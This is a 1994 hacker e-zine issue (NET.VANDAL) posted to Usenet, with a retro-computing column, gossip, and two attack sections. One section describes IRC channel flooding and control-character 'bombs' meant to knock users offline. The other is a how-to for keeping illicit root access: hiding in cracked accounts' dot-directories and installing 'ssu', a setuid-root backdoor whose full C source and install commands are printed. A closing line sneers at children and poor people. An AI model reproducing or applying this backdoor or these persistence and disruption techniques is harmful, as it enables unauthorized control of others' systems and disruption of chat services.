Copy Link
Add to Bookmark
Report
Net Vandal 2
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
*VOL:1* NUMBER 2, Oct. 29, 1994 ALL WRONGS DESERVED TORONTO
///////////////////////////////////////////////////////////////////
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
///NET.VANDAL///NET.VANDAL///NET.VANDAL///NET.VANDAL///NET.VANDAL//
\\NET.VANDAL\\\NET.VANDAL\\\NET.VANDAL\\\NET.VANDAL\\\NET.VANDAL\\
///NET.VANDAL///NET.VANDAL///NET.VANDAL///NET.VANDAL///NET.VANDAL//
\\NET.VANDAL\\\NET.VANDAL\\\NET.VANDAL\\\NET.VANDAL\\\NET.VANDAL\\
///NET.VANDAL///NET.VANDAL///NET.VANDAL///NET.VANDAL///NET.VANDAL//
\\NET.VANDAL\\\NET.VANDAL\\\NET.VANDAL\\\NET.VANDAL\\\NET.VANDAL\\
///////////////////////////////////////////////////////////////////
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
///// An Exercise in Irritainment and Technological Pranking /////
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
NET.VANDAL vol 1, number 2
\\\\\\\\\\\\\\\\\\\\\\\\\\
Brought to you by: The Most Reverend Lucifer Messiah
CONTENTS
ontent
nten
..
* F E A T U R E *
Where Have We Been?
- The Most Reverend Father Looks at the Last 10 Years In Computing.
* G O S S I P - R U M O U R - F E E D B A C K *
- Spelling Bees, Heroics, IRC tricks
* C A B A L T R I C K S *
More cool IRC tricks
- Channel Bombing and Flooding
* S P O R T S *
Identity Crisis
- Securing Illicit Root Accesses
" I have nightmares when I'm asleep, too. "
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
* F E A T U R E *
Where Have We Been?
- The Most Reverend Father Looks at the Last 10 Years In Computing.
I keep copies of all the computer magazines I've ever bought, or received by
subscription. Trying really hard not to date myself, I came across a copy
of the August 1985 issue of CAD/CAM & Robotics [1] magazine, which
immediately caught my attention.
The original idea behind this article was to poke a laughing finger at
technology, while musing at far we have come. I was in for a rude
awakening, which has changed my view entirely. The title of this column was
originally intended to invoke a somewhat nostalgic air in the reader.
Now, I am shrugging shoulders, looking at my PC, and saying, "My gawd, where
have we been?".
The advertisement on the inner cover really got me distressed. In it
is pictured a wire-frame drawing of something, god knows what, displayed on
what had to be nothing less than Super-VGA graphics, on a computer with a
base-footprint about the same size around as most desktop cases, but half the
height, with one 5 3/4 inch floppy drive, a mouse, and the most wicked
looking keyboard I've ever seen.
First off, in 1985 we were stuck with CGA graphics, not this incredibly
fine-detailed stuff. So I read the advertisement. Here is how it went:
---
From the experts in interactive graphics -
The Professional's Workstation
The InterPro 32 from Intergraph... the multi-tasking,
multi-functional workstation for today's professional
A personal Computing Resource
Powerful processors - including the 32-bit NSC 32032 - and extensive memory
equip the InterPro 32 as a standalone computing resource under UNIX System V
and PC-DOS. With no hidden processor under your desk.
A distributed processing resource
For access to distributed corporate computing resources, we built the
InterPro 32 with industry-standard networking - Intergraph's ISO 802.3
(Ethernet) architecture - and terminal emulation - the InterPro 32 serves as
an Intergraph graphics workstation linkedto a VAX or MicroVAX, a VT100 and
VT220, Tektronix 4105, and (via a gateway) IBM 327x.
Plus interactive color graphics
Even more, the InterPro 32 features high-resolution, interactive color
graphics...graphics backed by Intergraph's years of technological
leadership. With a palette of 4096 for the image clarity and impact that
only color can give.
The InterPro 32 - a multi-functional professional workstation.
INTERGRAPH
Intergraph Sysems Ltd
[address, etc] [2]
---
Honestly! This is not a circa-1993 IBM advertisement! This ad is 9 years
old.
Now, in 1985, I thought I had a pretty hot machine. In fact, most of my
friends thought I had a pretty hot machine. It was a brand new 8086 XT,
blazing at 4.77 Mega-hurts (They hadn't reached 8Mhz yet), and running a
CGA, which was the newest in graphics crazes. And it ran PC-DOS. The case
was absolutely humoungous, and weighed more than I care to guestimate. It
also had a single floppy drive, and a massive 20 Megabyte hard drive. I was
often caught laughing at the fact that a lot of major companies were still
using the 3M CBC System (Communicate By Card).
What is this system, same year, same operating system, but with a 32-bit
processor, multitasking, 4096 colours on the graphics (CGA has 4), and all
those other options and buzzwords that have only just hit us IBM'ers
recently?
In fact, curiosity forced me to go through the magazine page by page, ad by
ad, to figure out what the resolution of that monitor actually was.
One possible answer was on the last page. Tektronix had a monitor, 4096
colours. The resolution: 1280x1024 at 60Hz, non-interlaced! WHAT????
Folks... there is something seriously wrong with this iNTEL thing.
We thought we had problems when Microsoft got in caca for violating
copyrights, so they had to change things, and remove a few options from
their disk stacker. Because of this, the change from DOS 6.00 through to
6.2 was a DOWNgrade. Hardly progress.
We thought we had problems when iNTEL released the 80286. The new options
in this machine were so unpopular, iNTEL quickly released the 80386, saying
that it was what they were trying to do in the first place. The 80286? Try
selling one nowadays. Hardly progress indeed!
The 80386 sounds not too much more advanced than the 32032 machine mentioned
in the ad. Why did it take this long for iNTEL to catch up? In fact, it
took about this long for graphics resolutions like the monitor in the ad, to
appear for it.
Then iNTEL released the 80486. To this day, there is no software that
requires an 80486+ machine. The only benefit seems to be in speed. It was
an advancement, just not very much.
And the Pentium is a very hot chip indeed, in more ways than one. Prone to
overheating, and just as expensive as a lower end mini-mainframe. The only
thing it does seem to add to the market is yet more speed, because the new
opcode list doesn't really show much of an improvement. CPUID is
virtually useless, unless you expect that you want to keep upgrading with
iNTEL beyond the Pentium. Since no software demands a minimum of a 486 yet,
I doubt that there will be one that will require a Pentium.
But the Pentium really was a step in the right direction. It has 64 bit
buses, a humoungo prefetch queue, a killer internal code bus, and lots of
other hardware enhancements well beyond the 80486, and above the 32032
mentioned in the ad above. In hardware detail, the system is excellent.
But then again, this is now 9 years after the 32032. It is still a curious
fact that the 80x86 series took 9 years for to break Intergraph's 32-bit
barrier. I'd be more inclined to buy the mini-mainframe.
Unfortunately, I don't know what the most recent descendant to the 32032 is.
But I have a feeling it is a whole new article unto itself.
[1] Published by Kerrwil Publications. Unknown if it still exists.
[2] Editor promises to never quote an entire advertisement again. <g>
//////////////////////////////////////////////////////////////////////////////
* G O S S I P - R U M O U R - F E E D B A C K *
Gads. Someone told me that my spelling sucks, and suggests that I do
something about it. Considering Linux has 2 spell checkers online, I'm not
sure why I haven't bothered to ever use them. So look forward to better
spelling, I gess.
To the dude who forged a letter just to ask me if I thought I was some kind
of hero: as a matter of fact, I _do_ think I'm better than other people. My
psychiatrist assures me that I have an admirable contact with reality. I
mean, I would never say that I'm better than I really am. That would be
impossible anyway.
[I'm still trying to figure out why you said that. You're mother has always
delighted in telling new navy recruits and submissive Bay-streeters how
stupid you are, so you're obviously not trying to prove anything.]
Sharkboy, thanks for the encouragement, and comments on my IRC article.
This issue's CABAL TRICKS should keep you busy. There is a good chance that
we will publish a few more IRC columns in the future.
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
* C A B A L T R I C K S *
More cool IRC tricks
- Channel Bombing and Flooding
When one considers the vast number of machines being synchronized with each
other to suffer the load of a chat system as large and as far reaching as the
Internet Relay Chat, it is a marvel that things do not become more spasmodic
and erratic than it already does.
The object of this issue's Cabal Tricks is to present a few ideas, and to
demonstrate ways in which the irc can pushed into a state of chaos.
Flooding:
--------
Anyone who has ever used irc is well acquainted with the occasional lag, and
the continuous net splits. Both of these are symptoms of a site becoming
more and more out of sync with the others on the net. Lagging is caused
from a certain degree of out-of-sync'edness. Lags are virtually harmless,
but terribly annoying, since messages take so long to get to and from users
on that client. A net split occurs when the site is so far behind that the
irc client running on it must reset itself to catch back up the other
systems.
This resetting action occurs in response to two conditions. The first being
outlined above, and the second, when too much information is forced through
to be processed by the irc client. When this happens, it is called
flooding.
On many sites, piping in a large text file is enough to cause a flood.
Although it works, it isn't very creative. As well, on the sites that it
doesn't work, flood detection will usually reset the log source first (that
source being you).
There are many more interesting ways to do it, which will not set off the
flood detection on your end, but will usually knock of the other people.
Even if it doesn't, you can delight in watching them fume about system speed
problems, or annoying screen activity.
The included script contains the following flood commands, plus several
more:
/tsunami The original tsunami flood that all the irc MOTDs warn you
against.
/sedflood Floods a user with [ENCRYPTED MESSAGE] tokens.
A NET.VANDAL reader also suggested a simple command which seems to slow down
the channel incredibly if there are lots of people using it. The command is:
/ping *
It is especially effective if executed several times one right after the
other. It manages to avoid flooding, but there is a noticeable choppiness
(lag) with irc in that channel.
Bombing:
-------
In my never-too-humble opinion, bombing is much more interesting than
flooding, in any regard. Because of their nature, often not everyone on the
channel is affected by channel bombing. It is still interesting to watch
when half the channel start bitching and logging off en masse, while the
other half sits there wondering what happened.
I would like to thank Vassago for Gargoyle, which was heavily relied upon to
make this script. And to TSP, a 13 year old pseudo-hacker who easily proves
that when Anton Levey said, "There is no mind more genuinely evil than that
of a child", he wasn't kidding, for bringing me these irc scripts and a few
new ideas.
The bomb abuses the fact that channel keys can contain control characters.
That is to say, characters created by pressing a key with the <ctrl> key
pushed down as well. These characters usually appear as a bolded capital
version of the letter that you pressed, or as some other bolded symbol.
For instance, <ctrl>+b would looks like a bright 'B'.
This makes it possible to create various annoying escape sequences, which
will be interpreted as VT100 or ANSI codes to do other things.
The script included in the uuencoded file contains several bombs. Here is a
list some of the bombs, and what they do:
/bdie logs channel users off of irc
/bsz constantly invokes auto-zmodem on DOS and Windoze users
/bblack makes the screen turn black
/bfire prints a blinking red FIRE!!! on the status bar
Here is the script. To use it, uudecode it (uuencoding it avoids the
control characters from being altered while shipping NET.VANDAL). Then use
gunzip to uncompress trick.gz. When you are in irc, type:
/load tricks
After, you may type /tricks to get a list of the irc tricks available.
There is a few undocumented tricks, as well. (hint: One of these
undocumented tricks is set off when someone tries to ping you).
There is so much more that you can do with these. But I have only planted
the seed. Please, if you come up with any good ideas to follow this up
with, post them to the list, by mailing to net.van...@hack.pcscav.com.
Enjoy.
--- snip --- snip --- snip --- snip --- snip --- snip --- snip --- snip ---
--- snip --- snip --- snip --- snip --- snip --- snip --- snip --- snip ---
//////////////////////////////////////////////////////////////////////////////
* S P O R T S *
Identity Crisis
- Securing Illicit Root Accesses
Getting root access on a system is tough enough, but what about keeping that
access once you've gotten it?
After you have successfully cracked root access on a system, it is pretty
well mandatory that you get in and out of there as quick as possible, to
avoid detection by the system administrator. The easiest way is to run as
root from another account.
There are at least two good methods if you don't already have your own
account on the system. Either way, it is probably a good idea to NOT use
your own account if you do have one there.
The first one is to also crack a rarely-used account, or the account of
someone new to Unix. They usually won't notice any changes to their home
directory, and disregard the "Last login ..." message. Creating a directory
with a '.' as the first character will keep it invisible enough to the real
owner of the account. The following file names are rather good form:
~/.tinrc/.tinrc
~/.emacs/.temp
You can likely do your work in these directories without ever getting
caught, even if you store stuff there.
The second way is to set up your own account. (You have root, remember).
Use whichever method at your own discretion. On a large system, this
method is probably best. On a smaller system, forget it. Use someone
else's account.
From that account, you are free to run 'su' and login as root. This way,
'who' doesn't report that root is logged in somewhere that it shouldn't be.
This still leaves one problem. If the system administrator changes the root
password, which according to Murphy's Law, he will, you are back where you
started from.
This is where 'ssu' comes in. 'ssu' is a small program (compiled under linux
it is 9220 bytes) which runs a program suid as 'root'. The benefit to this
over 'su' is that it never asks for a password. If the root password is
ever changed, it won't matter.
Running 'ssu bash' will give you a root shell, but won't report it as
such to anybody. Here is the output of 'w' as reported to the user (in this
case, cboyd):
---
bash# w
8:12pm up 127 days, 4:39, 2 users, load average: 0.00, 0.01, 0.00
User tty from login@ idle JCPU PCPU what
root tty1 5:19pm 2 -bash
cboyd ttyS5 7:42pm -
bash#
bash# whoami
root
bash#
---
The fun is in the reply to the 'whoami' command. Oddly enough, 'who am i'
tells the truth, outputting this:
---
bash# who am i
cinema!cboyd ttyS5 Oct 24 19:42
bash#
---
This is no cause for concern though. Here is the output of 'w' as root sees
it:
---
root:/tmp# w
8:13pm up 127 days, 4:40, 2 users, load average: 0.00, 0.01, 0.00
User tty from login@ idle JCPU PCPU what
root tty1 5:19pm 1 1 -w
cboyd ttyS5 7:42pm -
---
Even if root runs 'w -u cboyd', he will only see that you are running
'bash'.
Something else to keep in mind. The UID and UID of ssu will determine which
user you will become. Of course, our example makes you root, but I could
very easily have made it cboyd, and then hidden the file somewhere. Doing
this would give any user who executes ssu access to cboyd's home directory,
amongst other things.
Because of its innocuous sounding name, you could probably install the
program in the /usr/bin directory, which usually contains more executable
files than any other directory on the disk, without it ever being noticed.
This way, if you lose the account you were using, you can use another one,
and still have the same access.
Remember to exit the 'su' shell as soon as you are done compiling and
installing 'ssu'. There is no need to add unneccessary risk to what you
are doing.
Here is the source code. Put the following into a file called ssu.c and
follow the instructions contained in the code.
--- snip --- snip --- snip --- snip --- snip --- snip --- snip --- snip ---
/*****************************************************************************
The Secret Super User
---------------------
Brought to you by: The Most Reverend Father Lucifer Messiah
USAGE: ssu <file to execute as root>
INSTALLATION:
Do the following as root or suid as root:
cc ssu.c -o ssu
strip ssu
chown root.bin ssu
chmod 4755 ssu
mv ssu /usr/bin
******************************************************************************/
#include <stdio.h>
main (argc,argv)
int argc;
char **argv;
{
int gid;
int egid;
int uid,i;
char execute[1000];
gid = getgid();
uid = geteuid();
setuid(uid);
egid = getegid();
setregid(egid);
for(i=1;i<argc;i++){
strcat (execute," ");
strcat(execute,argv[i]);
}
system(execute);
exit (1);
}
--- snip --- snip --- snip --- snip --- snip --- snip --- snip --- snip ---
End Issue
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
Addendum:
Kids must be the most worthless thing in the world. Why else would poor
people have so many of them?
Personal mail to:
luci...@csis.pcscav.com
all wrongs deserved, granted "post-everywhere" status by the teenage buddha.
//////////////////////////////////////////////////////////////////////////////
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
//////////////////////////////////////////////////////////////////////////////
<<<<<<<<<<===NET.VANDAL===>>>>>>>>>>
will appear whenever I get to it
(good forgeries are welcomed)
How do I JOIN NET.VANDAL?
************************
Join the list at any time by sending a "SUBSCRIBE NET.VANDAL"
command in the body of a message to net.vandal-requ...@hack.pcscav.com
How do I LEAVE NET.VANDAL?
*************************
Leave the list at any time by sending an "UNSUBSCRIBE NET.VANDAL"
command in the body of a message to net.vandal-requ...@hack.pcscav.com
How do I SUBMIT INFO to NET.VANDAL?
**********************************
Send your articles addressed to net.van...@hack.pcscav.com
<<<<<<<<<<===NET.VANDAL===>>>>>>>>>>
--
The Most Reverend Father Lucifer Messiah
"If you act like a dumbshit, Subscribe to NET.VANDAL
they'll treat you as an equal" Send "SUBSCRIBE" to:
- J.R. "Bob" Dobbs net.van...@hack.pcscav.com
--- Internet Message Header Follows ---
Xref: netcomsv ont.general:14235 tor.general:9690 alt.net.scandal:222
alt.zines:6494 alt.journalism:7876 alt.insults.gangbang:101 can.general:23971
alt.usenet.kooks:10446 alt.activism:76536 alt.2600:29922 alt.news-media:11462
Newsgroups: ont.general, tor.general, alt.net.scandal, alt.zines,
alt.journalism, alt.insults.gangbang,can.general,alt.usenet.kooks,
alt.activism,alt.2600,alt.news-media
Path: netcomsv!netcomsv!decwrl!lll-winken.llnl.gov!uwm.edu!cs.utexas.edu!
utnut!utzoo!utdoe!io.org!reptiles.org!geac!gts!lethe!uunorth!csis!lucifer
From: luci...@csis.pcscav.com (Lucifer Messiah)
Subject: NET.VANDAL: VOLUME 1 ISSUE 2
Message-ID: <1994Oct29.071234.6...@csis.pcscav.com>
Organization: More like Disorganization
Date: Sat, 29 Oct 1994 07:12:34 GMT
X-Newsreader: TIN [version 1.2 PL2]
Lines: 553
